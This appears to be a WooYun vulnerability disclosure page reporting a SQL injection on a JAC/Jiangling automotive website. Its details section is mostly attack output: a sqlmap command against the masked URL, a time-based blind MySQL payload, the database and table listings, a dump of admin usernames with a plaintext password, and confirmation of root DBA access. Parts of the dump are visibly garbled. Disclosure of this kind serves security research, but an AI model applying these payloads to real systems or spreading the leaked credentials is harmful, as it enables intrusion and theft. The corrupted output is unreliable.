当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165270

漏洞标题:江淮汽车某站SQL注入/管理员密码/DBA权限

相关厂商:cncert国家互联网应急中心

漏洞作者: 逆流冰河

提交时间:2015-12-29 01:00

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-29: 细节已通知厂商并且等待厂商处理中
2016-01-05: 厂商已经确认,细节仅向厂商公开
2016-01-15: 细节向核心白帽子及相关领域专家公开
2016-01-25: 细节向普通白帽子公开
2016-02-04: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

江淮汽车中国神车

详细说明:

1,注入点:
sqlmap -u "http://**.**.**.**/jmclove/index.php/news/detail/id/438*" --batch
2,注入信息:
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://**.**.**.**:80/jmclove/index.php/news/detail/id/438) AND (SELECT * FROM (SELECT(SLEEP(5)))GzGl) AND (1231=1231
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
available databases [10]:
[*] information_schema
[*] jiangling
[*] jiangling3
[*] leibotech
[*] leibotech3
[*] mysql
[*] repldb
[*] test
[*] transitsales
[*] yuhu
3,表信息
Database: jiangling
[83 tables]
+--------------------------+
| Admin |
| Book |
| Book_copy |
| Book_copy1 |
| Category |
| Dealer_co |
| IP |
| Owners |
| Service |
| ServiceMain |
| SurveryView |
| SurveyUsers |
| TestDrive |
| Usess |
| a_yuhu_count) |
| b_yusheng-20150907和之前的整合圩一起没事可以删除 |
| b_yusheng_ke\\?81 |
| nusheng_contribute\x11 |
| a_ditangxing1_baoming |
| a_ditangxing1_photo |
| a_ditangxing1_stat |
| a_ditangxing_baoming |
| a_ditangxing_photo |
| a_ditangxing_stat |
| a_duanwu_survey |
| a_duenwu_contribute |
| a_jmc2015_360che |
| a_kairui |
| a_kairui_count |
| a_kuirui_ip |
| a_quanshun |
| a_quanshun_20150204 |
| a_quanshun_20150323 |
| a_quanshun_key |
| a_sitekvs |
| a_stat |
| a_yuhu |
| a_yuhu_ip |
| a_yuhu_join |
| admin_info |
| aealer |
| b_quanshun |
| b_quanshun_dealer |
| b_quanshun_dealer1 |
| b_quanshun_key |
| b_transitat |
| b_yusheng |
| b_yusheng_dealer |
| b_yusheng_main |
| city |
| dealermain |
| ford_aboutweb |
| ford_activity |
| ford_cmscp_manager |
| ford_cmscp_role |
| ford_cmscp_settinq |
| ford_log |
| ford_saletips |
| ford_sraining |
| ford_usehelp |
| ford_user |
| ford_user_import_history |
| ford_user_score_change |
| jl_yh |
| news |
| newsmain |
| nusheng_survey |
| province |
| qs_code |
| survey |
| survey_list |
| user_info |
| vote_info |
| works_info |
| xq_ad |
| xq_donation |
| xq_frieod |
| xq_love |
| xq_loveyear |
| xq_news |
| xq_newscate |
| xq_options |
| xq_pages |
+--------------------------+
4,Table: Admin
[10 entries]
+----+------------+------------+-----------------+------------+---------------------+---------------------+------------+------------+
| id | roles | username | direction | updated_by | created_at | updated_at | created_by | p}ssword |
+----+------------+------------+-----------------+------------+---------------------+---------------------+------------+------------+
| 1 | admin | jiangling | news/index | 1 | 2013-04-04 20:30:02 | 2013-09-02 20:30:06 | 1 | q |
| 2 | data | yusheng | book/ysexport | 1 | 2013-09-02 18:07:59 | 2013-09-02 18:08:03 | 1 | <blank> |
| 3 | survey | survey | surve{/index | 1 | 2013-09-17 08:13:44 | 2013-09-17 08:13:46 | 1 | <blank> |
| 4 | duanwu | duanwu | duanwu/admin | 1 | 0000-00-00 00:00:90 | 0000-00-00 00:00:00 | 1 | <blank> |
| 5 | ditangxing | ditangxing | ditayxing/admin | 1\x05 | 0000-00-00 @0:00:00 | 0000-00-00 00:00:00 | 1 | <blank> |
| 6 | testdrive | testdrive | testdrive/admin | 1 | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1 | <blank> |
| 8 | dtx2015 | dtx2015 | dtx2015/admin | 1 | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1 | <blank> |
| 10 | jmdsj | jmcsj | jmcsj/zxsj | 1 | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1 | <blank> |
| 11 | xyss350 | xyss350 | yusheng/admin | 1 | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 1 | <blank> |
| 12 | qsyysj | qsyysj | jmcsj/admin | 1 | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 0 | <blank> |
+----+------------+------------+-----------------+------------+---------------------+---------------------+------------+------------+
5,DBA
[05:58:46] [INFO] fetching current user
[05:58:46] [INFO] resumed: root@localQ?ost
current user is DBA: True

漏洞证明:

Fix

修复方案:

Fix

版权声明:转载请注明来源 逆流冰河@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-05 17:05

厂商回复:

CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无